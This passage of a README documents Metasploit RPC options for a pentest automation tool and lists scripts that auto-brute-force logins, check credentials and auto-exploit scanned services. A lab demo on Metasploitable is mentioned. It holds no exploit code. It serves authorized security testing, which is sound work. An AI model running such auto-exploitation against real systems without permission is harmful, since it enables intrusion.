  -P MSFRPC_PORT, --msfrpc-port MSFRPC_PORT
                        Override MSFRPC_PORT envvar
  -u MSFRPC_USER, --msfrpc-user MSFRPC_USER
                        Override MSFRPC_USER envvar
  -p MSFRPC_PASS, --msfrpc-pass MSFRPC_PASS
                        Override MSFRPC_PASS envvar
  -S, --msfrpc-ssl      Override MSFRPC_SSL envvar
  -U MSFRPC_URI, --msfrpc-uri MSFRPC_URI
                        Override MSFRPC_URI envvar
  -o OUTPUT, --output OUTPUT
                        Output file
  -l LOG, --log LOG     Log file
  -x XML, --xml XML     XML to import in temp workspace
  -m MODULES, --modules MODULES
                        Modules to use
  -r RESOURCE, --resource RESOURCE
                        Resource to execute
  -O OPTIONS, --options OPTIONS
                        Modules options
  -c COMMAND, --command COMMAND
                        Command to execute (check, run, exploit)
  -T, --disable-tmp-ws  Do not create temp workspace and use current
  -q, --quiet           Quiet mode, set -l options to have log in a file
```

Any feedback is welcome :)
## Added scripts

All scripts that use the `msfrpc` plugin start with `msf-`:
- `extra/msf-autobrute.sh`
- `extra/msf-auto-cred-checker.sh`
- `extra/msf-autoexploit-check.sh`
- `extra/msf-autoexploit-dry.sh`
- `extra/msf-autoexploit.sh`
- `extra/msf-autosploit.sh`
- `extra/msf-modules-list.sh`
- `extra/msf-mssql-brute.sh`
- `extra/msf-nessus-vulns-cleaner.sh`
- `extra/msf-port-cleaner.sh`
- `network/msf-autoscan.sh`
- `network/msf-basic-discovery-nmap.sh`
- `network/msf-basic-discovery.sh`
- `network/msf-portscan-nmap.sh`
- `network/msf-portscan.sh`
- `web/msf-autocrawler.sh`
- `web/msf-http-dir.sh`
- `web/msf-wmap-autotest.sh`
## Added metasploit resources
- `resources/autoscan.rc` - It will check for all open services in the msf db and try scanners who match with default `RPORT` option
- `resources/autosploit.rc` - Same as `autoscan.rc` but for exploits.

Example output of these resources on [github gist](https://gist.githubusercontent.com/Sliim/a5c057256f0ebd264a85e0b0f0ead591/raw/6d458bf0ded3ddfc9062946c248127d912b3b236/resources.out)
## Demonstrations

I made videos to setup cscan with following scripts:
- `msf-basic-discovery-nmap.sh`
- `msf-autoscan.sh`
- `msf-autosploit.sh`

Cscan will scan metasploitable 2 and 3 machines, and attempt to autosploit machines (got 7 shells on metasploitable2 :))

The youtube playlist: https://www.youtube.com/watch?v=FQjagSM1T2E&list=PLk_I6VgAdVmX7NMwhv863u55LmODGF4uO

Here is the example in my [pentest-env](https://github.com/Sliim/pentest-env) project: https://github.com/Sliim/pentest-env/blob/master/docs/examples/Cscan-msfrpc.md

Happy Hacking!
